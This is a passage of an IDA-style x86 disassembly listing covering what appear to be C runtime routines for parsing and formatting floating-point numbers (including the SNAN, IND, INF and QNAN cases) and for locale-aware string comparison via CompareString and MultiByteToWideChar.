loc_42DC00: ; CODE XREF: sub_42DB5C+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_42DBB3
; ---------------------------------------------------------------------------
loc_42DC0C: ; CODE XREF: sub_42DB5C+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_42DBB3
; ---------------------------------------------------------------------------
loc_42DC15: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
cmp bl, 31h ; jumptable 0042DBBF case 1
mov [ebp+var_10], edx
jl short loc_42DC22
cmp bl, 39h
jle short loc_42DBD0
loc_42DC22: ; CODE XREF: sub_42DB5C+BF�j
cmp bl, byte_449A48
jz loc_42DCEA
cmp bl, 2Bh
jz short loc_42DC64
cmp bl, 2Dh
jz short loc_42DC64
cmp bl, 30h
jz short loc_42DC8F
loc_42DC3D: ; CODE XREF: sub_42DB5C+207�j
cmp bl, 43h
jle loc_42DECF
cmp bl, 45h
jle short loc_42DC5D
cmp bl, 63h
jle loc_42DECF
cmp bl, 65h
jg loc_42DECF
loc_42DC5D: ; CODE XREF: sub_42DB5C+ED�j
push 6
jmp loc_42DE2C
; ---------------------------------------------------------------------------
loc_42DC64: ; CODE XREF: sub_42DB5C+D5�j
; sub_42DB5C+DA�j ...
dec edi
push 0Bh
jmp loc_42DE2C
; ---------------------------------------------------------------------------
loc_42DC6C: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
cmp bl, 31h ; jumptable 0042DBBF case 2
jl short loc_42DC7A
cmp bl, 39h
jle loc_42DBD0
loc_42DC7A: ; CODE XREF: sub_42DB5C+113�j
cmp bl, byte_449A48
jz loc_42DBDF
cmp bl, 30h
jnz loc_42DE44
loc_42DC8F: ; CODE XREF: sub_42DB5C+9F�j
; sub_42DB5C+DF�j
mov eax, edx
jmp loc_42DBB3
; ---------------------------------------------------------------------------
loc_42DC96: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
mov [ebp+var_10], edx ; jumptable 0042DBBF case 3
loc_42DC99: ; CODE XREF: sub_42DB5C+184�j
cmp dword_449A44, edx
jle short loc_42DCB2
movzx eax, bl
push esi
push eax
call sub_42653A
pop ecx
pop ecx
push 1
pop edx
jmp short loc_42DCC0
; ---------------------------------------------------------------------------
loc_42DCB2: ; CODE XREF: sub_42DB5C+143�j
mov ecx, off_449838
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_42DCC0: ; CODE XREF: sub_42DB5C+154�j
test eax, eax
jz short loc_42DCE2
cmp [ebp+var_4], 19h
jnb short loc_42DCDA
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_42DCDD
; ---------------------------------------------------------------------------
loc_42DCDA: ; CODE XREF: sub_42DB5C+16C�j
inc [ebp+var_8]
loc_42DCDD: ; CODE XREF: sub_42DB5C+17C�j
mov bl, [edi]
inc edi
jmp short loc_42DC99
; ---------------------------------------------------------------------------
loc_42DCE2: ; CODE XREF: sub_42DB5C+166�j
cmp bl, byte_449A48
jnz short loc_42DD51
loc_42DCEA: ; CODE XREF: sub_42DB5C+CC�j
mov eax, esi
jmp loc_42DBB3
; ---------------------------------------------------------------------------
loc_42DCF1: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
cmp [ebp+var_4], 0 ; jumptable 0042DBBF case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_42DD0A
loc_42DCFD: ; CODE XREF: sub_42DB5C+1AC�j
cmp bl, 30h
jnz short loc_42DD0A
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_42DCFD
; ---------------------------------------------------------------------------
loc_42DD0A: ; CODE XREF: sub_42DB5C+19F�j
; sub_42DB5C+1A4�j ...
cmp dword_449A44, edx
jle short loc_42DD23
movzx eax, bl
push esi
push eax
call sub_42653A
pop ecx
pop ecx
push 1
pop edx
jmp short loc_42DD31
; ---------------------------------------------------------------------------
loc_42DD23: ; CODE XREF: sub_42DB5C+1B4�j
mov ecx, off_449838
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_42DD31: ; CODE XREF: sub_42DB5C+1C5�j
test eax, eax
jz short loc_42DD51
cmp [ebp+var_4], 19h
jnb short loc_42DD4C
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_42DD4C: ; CODE XREF: sub_42DB5C+1DD�j
mov bl, [edi]
inc edi
jmp short loc_42DD0A
; ---------------------------------------------------------------------------
loc_42DD51: ; CODE XREF: sub_42DB5C+18C�j
; sub_42DB5C+1D7�j
cmp bl, 2Bh
jz loc_42DC64
cmp bl, 2Dh
jz loc_42DC64
jmp loc_42DC3D
; ---------------------------------------------------------------------------
loc_42DD68: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
cmp dword_449A44, edx ; jumptable 0042DBBF case 5
mov [ebp+var_24], edx
jle short loc_42DD84
movzx eax, bl
push esi
push eax
call sub_42653A
pop ecx
pop ecx
push 1
pop edx
jmp short loc_42DD92
; ---------------------------------------------------------------------------
loc_42DD84: ; CODE XREF: sub_42DB5C+215�j
mov ecx, off_449838
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_42DD92: ; CODE XREF: sub_42DB5C+226�j
test eax, eax
jz loc_42DE44
mov eax, esi
jmp short loc_42DDF5
; ---------------------------------------------------------------------------
loc_42DD9E: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
lea ecx, [edi-2] ; jumptable 0042DBBF case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_42DDAE
cmp bl, 39h
jle short loc_42DDF2
loc_42DDAE: ; CODE XREF: sub_42DB5C+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_42DE2A
dec eax
dec eax
jz short loc_42DE1E
sub eax, 3
jnz loc_42DED2
loc_42DDC3: ; CODE XREF: sub_42DB5C+2A4�j
push 8
jmp short loc_42DE2C
; ---------------------------------------------------------------------------
loc_42DDC7: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
mov [ebp+var_20], edx ; jumptable 0042DBBF case 8
loc_42DDCA: ; CODE XREF: sub_42DB5C+276�j
cmp bl, 30h
jnz short loc_42DDD4
mov bl, [edi]
inc edi
jmp short loc_42DDCA
; ---------------------------------------------------------------------------
loc_42DDD4: ; CODE XREF: sub_42DB5C+271�j
cmp bl, 31h
jl loc_42DECF
cmp bl, 39h
jg loc_42DECF
jmp short loc_42DDF2
; ---------------------------------------------------------------------------
loc_42DDE8: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
cmp bl, 31h ; jumptable 0042DBBF case 7
jl short loc_42DDFB
cmp bl, 39h
jg short loc_42DDFB
loc_42DDF2: ; CODE XREF: sub_42DB5C+250�j
; sub_42DB5C+28A�j
push 9
loc_42DDF4: ; CODE XREF: sub_42DB5C+76�j
pop eax
loc_42DDF5: ; CODE XREF: sub_42DB5C+240�j
dec edi
jmp loc_42DBB3
; ---------------------------------------------------------------------------
loc_42DDFB: ; CODE XREF: sub_42DB5C+28F�j
; sub_42DB5C+294�j
cmp bl, 30h
jnz short loc_42DE44
jmp short loc_42DDC3
; ---------------------------------------------------------------------------
loc_42DE02: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
cmp [ebp+arg_18], 0 ; jumptable 0042DBBF case 11
jz short loc_42DE32
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_42DE2A
dec eax
dec eax
jnz loc_42DED2
loc_42DE1E: ; CODE XREF: sub_42DB5C+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_42DBB3
; ---------------------------------------------------------------------------
loc_42DE2A: ; CODE XREF: sub_42DB5C+258�j
; sub_42DB5C+2B8�j
push 7
loc_42DE2C: ; CODE XREF: sub_42DB5C+85�j
; sub_42DB5C+103�j ...
pop eax
jmp loc_42DBB3
; ---------------------------------------------------------------------------
loc_42DE32: ; CODE XREF: sub_42DB5C+2AA�j
push 0Ah
dec edi
pop eax
loc_42DE36: ; CODE XREF: sub_42DB5C+5D�j
; sub_42DB5C+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0042DBBF case 10
jz loc_42DED4
jmp loc_42DBB3
; ---------------------------------------------------------------------------
loc_42DE44: ; CODE XREF: sub_42DB5C+12D�j
; sub_42DB5C+238�j ...
mov edi, [ebp+arg_8]
jmp loc_42DED4
; ---------------------------------------------------------------------------
loc_42DE4C: ; CODE XREF: sub_42DB5C+63�j
; DATA XREF: .text:off_42DFFD�o
mov [ebp+var_20], 1 ; jumptable 0042DBBF case 9
xor esi, esi
loc_42DE55: ; CODE XREF: sub_42DB5C+339�j
cmp dword_449A44, 1
jle short loc_42DE6D
movzx eax, bl
push 4
push eax
call sub_42653A
pop ecx
pop ecx
jmp short loc_42DE7C
; ---------------------------------------------------------------------------
loc_42DE6D: ; CODE XREF: sub_42DB5C+300�j
mov ecx, off_449838
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_42DE7C: ; CODE XREF: sub_42DB5C+30F�j
test eax, eax
jz short loc_42DE9C
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_42DE97
mov bl, [edi]
inc edi
jmp short loc_42DE55
; ---------------------------------------------------------------------------
loc_42DE97: ; CODE XREF: sub_42DB5C+334�j
mov esi, 1451h
loc_42DE9C: ; CODE XREF: sub_42DB5C+322�j
mov [ebp+var_1C], esi
loc_42DE9F: ; CODE XREF: sub_42DB5C+371�j
cmp dword_449A44, 1
jle short loc_42DEB7
movzx eax, bl
push 4
push eax
call sub_42653A
pop ecx
pop ecx
jmp short loc_42DEC6
; ---------------------------------------------------------------------------
loc_42DEB7: ; CODE XREF: sub_42DB5C+34A�j
mov ecx, off_449838
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_42DEC6: ; CODE XREF: sub_42DB5C+359�j
test eax, eax
jz short loc_42DECF
mov bl, [edi]
inc edi
jmp short loc_42DE9F
; ---------------------------------------------------------------------------
loc_42DECF: ; CODE XREF: sub_42DB5C+99�j
; sub_42DB5C+E4�j ...
dec edi
jmp short loc_42DED4
; ---------------------------------------------------------------------------
loc_42DED2: ; CODE XREF: sub_42DB5C+261�j
; sub_42DB5C+2BC�j
mov edi, ecx
loc_42DED4: ; CODE XREF: sub_42DB5C+2DD�j
; sub_42DB5C+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_42DFBC
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_42DF00
cmp [ebp+var_45], 5
jl short loc_42DEF4
inc [ebp+var_45]
loc_42DEF4: ; CODE XREF: sub_42DB5C+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_42DF03
; ---------------------------------------------------------------------------
loc_42DF00: ; CODE XREF: sub_42DB5C+38D�j
mov eax, [ebp+var_C]
loc_42DF03: ; CODE XREF: sub_42DB5C+3A2�j
cmp [ebp+var_4], 0
jbe loc_42DFB2
loc_42DF0D: ; CODE XREF: sub_42DB5C+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_42DF1B
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_42DF0D
; ---------------------------------------------------------------------------
loc_42DF1B: ; CODE XREF: sub_42DB5C+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_42DA95
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_42DF3A
neg eax
loc_42DF3A: ; CODE XREF: sub_42DB5C+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_42DF45
add eax, [ebp+arg_10]
loc_42DF45: ; CODE XREF: sub_42DB5C+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_42DF4D
sub eax, [ebp+arg_14]
loc_42DF4D: ; CODE XREF: sub_42DB5C+3EC�j
cmp eax, 1450h
jle short loc_42DF84
mov [ebp+var_2C], 1
loc_42DF5B: ; CODE XREF: sub_42DB5C+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_42DF67: ; CODE XREF: sub_42DB5C+454�j
; sub_42DB5C+45E�j
cmp [ebp+var_2C], 0
jz short loc_42DFCD
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_42DFE2
; ---------------------------------------------------------------------------
loc_42DF84: ; CODE XREF: sub_42DB5C+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_42DF94
mov [ebp+var_30], 1
jmp short loc_42DF5B
; ---------------------------------------------------------------------------
loc_42DF94: ; CODE XREF: sub_42DB5C+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_42EB32
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_42DF67
; ---------------------------------------------------------------------------
loc_42DFB2: ; CODE XREF: sub_42DB5C+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_42DF67
; ---------------------------------------------------------------------------
loc_42DFBC: ; CODE XREF: sub_42DB5C+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_42DFE2
; ---------------------------------------------------------------------------
loc_42DFCD: ; CODE XREF: sub_42DB5C+40F�j
cmp [ebp+var_30], 0
jz short loc_42DFE2
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_42DFE2: ; CODE XREF: sub_42DB5C+426�j
; sub_42DB5C+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_42DB5C endp
; ---------------------------------------------------------------------------
off_42DFFD dd offset loc_42DBC6 ; DATA XREF: sub_42DB5C+63�r
dd offset loc_42DC15 ; jump table for switch statement
dd offset loc_42DC6C
dd offset loc_42DC96
dd offset loc_42DCF1
dd offset loc_42DD68
dd offset loc_42DD9E
dd offset loc_42DDE8
dd offset loc_42DDC7
dd offset loc_42DE4C
dd offset loc_42DE36
dd offset loc_42DE02
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E02D proc near ; CODE XREF: sub_42C832+2B�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_42E08F
mov byte ptr [ebx+2], 2Dh
jmp short loc_42E093
; ---------------------------------------------------------------------------
loc_42E08F: ; CODE XREF: sub_42E02D+5A�j
mov byte ptr [ebx+2], 20h
loc_42E093: ; CODE XREF: sub_42E02D+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_42E0B9
test edi, edi
jnz short loc_42E0B9
cmp [ebp+arg_0], edi
jnz short loc_42E0B9
loc_42E0A4: ; CODE XREF: sub_42E02D+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_42E2B7
; ---------------------------------------------------------------------------
loc_42E0B9: ; CODE XREF: sub_42E02D+6C�j
; sub_42E02D+70�j ...
cmp dx, si
jnz short loc_42E138
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_42E0D2
cmp [ebp+arg_0], 0
jz short loc_42E0E1
loc_42E0D2: ; CODE XREF: sub_42E02D+9D�j
test edi, 40000000h
jnz short loc_42E0E1
push offset a1Snan ; "1#SNAN"
jmp short loc_42E127
; ---------------------------------------------------------------------------
loc_42E0E1: ; CODE XREF: sub_42E02D+A3�j
; sub_42E02D+AB�j
test cx, cx
jz short loc_42E0FB
cmp edi, 0C0000000h
jnz short loc_42E0FB
cmp [ebp+arg_0], 0
jnz short loc_42E122
push offset a1Ind ; "1#IND"
jmp short loc_42E10A
; ---------------------------------------------------------------------------
loc_42E0FB: ; CODE XREF: sub_42E02D+B7�j
; sub_42E02D+BF�j
cmp edi, eax
jnz short loc_42E122
cmp [ebp+arg_0], 0
jnz short loc_42E122
push offset a1Inf ; "1#INF"
loc_42E10A: ; CODE XREF: sub_42E02D+CC�j
lea eax, [ebx+4]
push eax
call sub_423260
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_42E119: ; CODE XREF: sub_42E02D+109�j
and [ebp+var_4], 0
jmp loc_42E290
; ---------------------------------------------------------------------------
loc_42E122: ; CODE XREF: sub_42E02D+C5�j
; sub_42E02D+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_42E127: ; CODE XREF: sub_42E02D+B2�j
lea eax, [ebx+4]
push eax
call sub_423260
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_42E119
; ---------------------------------------------------------------------------
loc_42E138: ; CODE XREF: sub_42E02D+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_42EB32
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_42E199
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_42E912
pop ecx
pop ecx
loc_42E199: ; CODE XREF: sub_42E02D+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_42E1B3
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_42E1B6
jmp loc_42E0A4
; ---------------------------------------------------------------------------
loc_42E1B3: ; CODE XREF: sub_42E02D+173�j
mov edi, [ebp+arg_C]
loc_42E1B6: ; CODE XREF: sub_42E02D+17F�j
cmp edi, 15h
jle short loc_42E1BE
push 15h
pop edi
loc_42E1BE: ; CODE XREF: sub_42E02D+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_42E1D4: ; CODE XREF: sub_42E02D+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_42DA3A
dec [ebp+arg_14]
pop ecx
jnz short loc_42E1D4
test esi, esi
jge short loc_42E1FE
neg esi
and esi, 0FFh
jle short loc_42E1FE
loc_42E1F1: ; CODE XREF: sub_42E02D+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_42DA68
dec esi
pop ecx
jnz short loc_42E1F1
loc_42E1FE: ; CODE XREF: sub_42E02D+1B8�j
; sub_42E02D+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_42E25B
mov [ebp+arg_C], ecx
loc_42E20E: ; CODE XREF: sub_42E02D+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_42DA3A
lea eax, [ebp+var_10]
push eax
call sub_42DA3A
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_42D9DC
lea eax, [ebp+var_10]
push eax
call sub_42DA3A
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_42E20E
mov eax, [ebp+arg_14]
loc_42E25B: ; CODE XREF: sub_42E02D+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_42E298
loc_42E268: ; CODE XREF: sub_42E02D+248�j
cmp eax, ecx
jb short loc_42E27B
cmp byte ptr [eax], 39h
jnz short loc_42E277
mov byte ptr [eax], 30h
dec eax
jmp short loc_42E268
; ---------------------------------------------------------------------------
loc_42E277: ; CODE XREF: sub_42E02D+242�j
cmp eax, ecx
jnb short loc_42E27F
loc_42E27B: ; CODE XREF: sub_42E02D+23D�j
inc eax
inc word ptr [ebx]
loc_42E27F: ; CODE XREF: sub_42E02D+24C�j
inc byte ptr [eax]
loc_42E281: ; CODE XREF: sub_42E02D+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_42E290: ; CODE XREF: sub_42E02D+F0�j
mov eax, [ebp+var_4]
loc_42E293: ; CODE XREF: sub_42E02D+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42E298: ; CODE XREF: sub_42E02D+239�j
; sub_42E02D+275�j
cmp eax, ecx
jb short loc_42E2A8
cmp byte ptr [eax], 30h
jnz short loc_42E2A4
dec eax
jmp short loc_42E298
; ---------------------------------------------------------------------------
loc_42E2A4: ; CODE XREF: sub_42E02D+272�j
cmp eax, ecx
jnb short loc_42E281
loc_42E2A8: ; CODE XREF: sub_42E02D+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_42E2B7: ; CODE XREF: sub_42E02D+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_42E293
sub_42E02D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E2C0 proc near ; CODE XREF: sub_42CEB9+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42FA80
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword_631748, ebx
push 1
pop edi
jnz short loc_42E333
push edi
mov eax, offset dword_42F620
push eax
push edi
push eax
push ebx
push ebx
call dword_42F12C ; CompareStringW
test eax, eax
jz short loc_42E310
mov dword_631748, edi
jmp short loc_42E333
; ---------------------------------------------------------------------------
loc_42E310: ; CODE XREF: sub_42E2C0+46�j
push edi
mov eax, offset word_44D6A0
push eax
push edi
push eax
push ebx
push ebx
call dword_42F130 ; CompareStringA
test eax, eax
jz loc_42E529
mov dword_631748, 2
loc_42E333: ; CODE XREF: sub_42E2C0+31�j
; sub_42E2C0+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_42E34A
push esi
push [ebp+arg_8]
call sub_42E53D
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_42E34A: ; CODE XREF: sub_42E2C0+78�j
cmp [ebp+arg_14], ebx
jle short loc_42E35F
push [ebp+arg_14]
push [ebp+arg_10]
call sub_42E53D
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_42E35F: ; CODE XREF: sub_42E2C0+8D�j
mov eax, dword_631748
cmp eax, 2
jnz short loc_42E384
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_42F130 ; CompareStringA
jmp loc_42E52B
; ---------------------------------------------------------------------------
loc_42E384: ; CODE XREF: sub_42E2C0+A7�j
cmp eax, edi
jnz loc_42E529
cmp [ebp+arg_18], ebx
jnz short loc_42E399
mov eax, dword_6314D8
mov [ebp+arg_18], eax
loc_42E399: ; CODE XREF: sub_42E2C0+CF�j
cmp esi, ebx
jz short loc_42E3A6
cmp [ebp+arg_14], ebx
jnz loc_42E43E
loc_42E3A6: ; CODE XREF: sub_42E2C0+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_42E3B3
loc_42E3AB: ; CODE XREF: sub_42E2C0+13C�j
; sub_42E2C0+16D�j
push 2
loc_42E3AD: ; CODE XREF: sub_42E2C0+146�j
pop eax
jmp loc_42E52B
; ---------------------------------------------------------------------------
loc_42E3B3: ; CODE XREF: sub_42E2C0+E9�j
cmp [ebp+arg_14], edi
jle short loc_42E3BF
loc_42E3B8: ; CODE XREF: sub_42E2C0+151�j
; sub_42E2C0+159�j ...
mov eax, edi
jmp loc_42E52B
; ---------------------------------------------------------------------------
loc_42E3BF: ; CODE XREF: sub_42E2C0+F6�j
cmp esi, edi
jg short loc_42E404
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call dword_42F19C ; GetCPInfo
test eax, eax
jz loc_42E529
cmp esi, ebx
jle short loc_42E408
cmp [ebp+var_3C], 2
jb short loc_42E404
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_42E404
loc_42E3EA: ; CODE XREF: sub_42E2C0+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_42E404
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_42E3FE
cmp cl, dl
jbe short loc_42E3AB
loc_42E3FE: ; CODE XREF: sub_42E2C0+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_42E3EA
loc_42E404: ; CODE XREF: sub_42E2C0+101�j
; sub_42E2C0+120�j ...
push 3
jmp short loc_42E3AD
; ---------------------------------------------------------------------------
loc_42E408: ; CODE XREF: sub_42E2C0+11A�j
cmp [ebp+arg_14], ebx
jle short loc_42E43E
cmp [ebp+var_3C], 2
jb short loc_42E3B8
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_42E3B8
loc_42E41B: ; CODE XREF: sub_42E2C0+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_42E3B8
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_42E433
cmp cl, dl
jbe loc_42E3AB
loc_42E433: ; CODE XREF: sub_42E2C0+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_42E41B
jmp loc_42E3B8
; ---------------------------------------------------------------------------
loc_42E43E: ; CODE XREF: sub_42E2C0+E0�j
; sub_42E2C0+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call dword_42F098 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_42E529
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_4220C0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42E48D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_42E48D: ; CODE XREF: sub_42E2C0+1B5�j
cmp [ebp+var_24], ebx
jz loc_42E529
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, dword_42F098
call esi ; dword_42F098
test eax, eax
jz short loc_42E529
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; dword_42F098
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_42E529
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4220C0
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42E4F8
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
